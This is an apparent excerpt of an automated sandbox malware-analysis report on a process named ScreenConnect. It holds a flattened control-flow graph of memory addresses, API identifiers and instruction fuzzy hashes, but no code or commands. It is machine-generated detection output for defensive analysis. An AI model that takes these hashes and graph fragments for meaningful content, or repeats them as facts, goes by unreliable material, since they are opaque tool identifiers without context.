                                                                                                                                                                      control_flow_graph 164 7ffd9b5f8e54-7ffd9b5f8e5b 165 7ffd9b5f8e66-7ffd9b5f8eb9 164->165 166 7ffd9b5f8e5d-7ffd9b5f8e65 164->166 169 7ffd9b5f8ebb-7ffd9b5f8eca 165->169 170 7ffd9b5f8f22-7ffd9b5f8f26 165->170 166->165 176 7ffd9b5f8ecc-7ffd9b5f8ef5 169->176 177 7ffd9b5f8f14-7ffd9b5f8f20 169->177 171 7ffd9b5f8f27 170->171 172 7ffd9b5f8fa2-7ffd9b5f8fac 170->172 174 7ffd9b5f8f98-7ffd9b5f8f99 171->174 175 7ffd9b5f8f28-7ffd9b5f8f2d 171->175 178 7ffd9b5f8fad 172->178 181 7ffd9b5f8f9b-7ffd9b5f8f9f 174->181 182 7ffd9b5f9002-7ffd9b5f9023 GlobalMemoryStatusEx 174->182 179 7ffd9b5f8f2f-7ffd9b5f8f31 175->179 180 7ffd9b5f8fae-7ffd9b5f8faf 175->180 183 7ffd9b5f8ef7-7ffd9b5f8efa 176->183 184 7ffd9b5f8f4e 176->184 177->170 178->180 179->178 186 7ffd9b5f8f33-7ffd9b5f8f37 179->186 192 7ffd9b5f8ff9-7ffd9b5f9000 180->192 193 7ffd9b5f8fb0-7ffd9b5f8fb1 180->193 181->172 187 7ffd9b5f902b-7ffd9b5f9052 182->187 188 7ffd9b5f9025 182->188 190 7ffd9b5f8efc-7ffd9b5f8efe 183->190 191 7ffd9b5f8f7b-7ffd9b5f8f7f 183->191 194 7ffd9b5f8f4f 184->194 195 7ffd9b5f8f39 186->195 196 7ffd9b5f8fb3-7ffd9b5f8fb8 186->196 188->187 197 7ffd9b5f8f7a 190->197 198 7ffd9b5f8f00 190->198 215 7ffd9b5f8f80 191->215 192->182 193->196 199 7ffd9b5f8fcb-7ffd9b5f8fce 194->199 200 7ffd9b5f8f50 194->200 195->191 203 7ffd9b5f8f3b-7ffd9b5f8f3d 195->203 207 7ffd9b5f8fb9-7ffd9b5f8fbe 196->207 197->191 204 7ffd9b5f8f43 198->204 205 7ffd9b5f8f02-7ffd9b5f8f04 198->205 201 7ffd9b5f8fd1-7ffd9b5f8ff7 199->201 200->201 202 7ffd9b5f8f51 200->202 201->192 209 7ffd9b5f8f93-7ffd9b5f8f97 202->209 210 7ffd9b5f8f52-7ffd9b5f8f56 202->210 203->207 211 7ffd9b5f8f3f-7ffd9b5f8f41 203->211 212 7ffd9b5f8f45 204->212 213 7ffd9b5f8fbf-7ffd9b5f8fc3 204->213 214 7ffd9b5f8f06 205->214 205->215 207->213 209->174 216 7ffd9b5f8f6c-7ffd9b5f8f79 210->216 217 7ffd9b5f8f58-7ffd9b5f8f5d 210->217 211->204 218 7ffd9b5f8f87-7ffd9b5f8f89 212->218 219 7ffd9b5f8f46-7ffd9b5f8f47 212->219 222 7ffd9b5f8fc5-7ffd9b5f8fca 213->222 220 7ffd9b5f8f49 214->220 221 7ffd9b5f8f08-7ffd9b5f8f0a 214->221 216->197 230 7ffd9b5f8f65-7ffd9b5f8f6b 217->230 226 7ffd9b5f8f8b-7ffd9b5f8f8e 218->226 227 7ffd9b5f8f8f 218->227 219->220 220->222 223 7ffd9b5f8f4b-7ffd9b5f8f4d 220->223 224 7ffd9b5f8f0c 221->224 225 7ffd9b5f8f86 221->225 222->199 223->184 224->194 231 7ffd9b5f8f0e-7ffd9b5f8f11 224->231 225->218 226->227 228 7ffd9b5f8f92 227->228 229 7ffd9b5f8f91 227->229 228->209 229->228 230->216 231->177
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000A.00000002.1849123075.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ffd9b5f0000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: GlobalMemoryStatus
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1890195054-0
                                                                                                                                                                      • Opcode ID: a5c687e5ace4fa2035f1a763994926c2b0994702f6f03170e5bbf06d6aecf415
                                                                                                                                                                      • Instruction ID: 1ebd7b7d4b5835fd7c4cd2ec06995f7a63fe048f0343419c382381aed4b7d074
                                                                                                                                                                      • Opcode Fuzzy Hash: a5c687e5ace4fa2035f1a763994926c2b0994702f6f03170e5bbf06d6aecf415
                                                                                                                                                                      • Instruction Fuzzy Hash: 1E814D31B0E6CD8FE7B697A448257A8BFE1EF56310F0541BAD05CC79A3DA246906C741
                                                                                                                                                                      Function 00007FFD9B2E8014 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000A.00000002.1843542681.00007FFD9B2E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2E0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ffd9b2e0000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MitigationPolicyProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1088084561-0
                                                                                                                                                                      • Opcode ID: e6e79ef99e37e2214a51b4b85793df2b9c68ba05e3210719716596dcc0b03717
                                                                                                                                                                      • Instruction ID: 6091ad3c7a6be83132b8c532adc28fd34f0e1991aec85656c8fb2f08ea7e4eb4
                                                                                                                                                                      • Opcode Fuzzy Hash: e6e79ef99e37e2214a51b4b85793df2b9c68ba05e3210719716596dcc0b03717
                                                                                                                                                                      • Instruction Fuzzy Hash: 14514931D0DB494FDB28AFA8DC5A5E97BE0EF55311F04017FE089C3292DE68B9468B91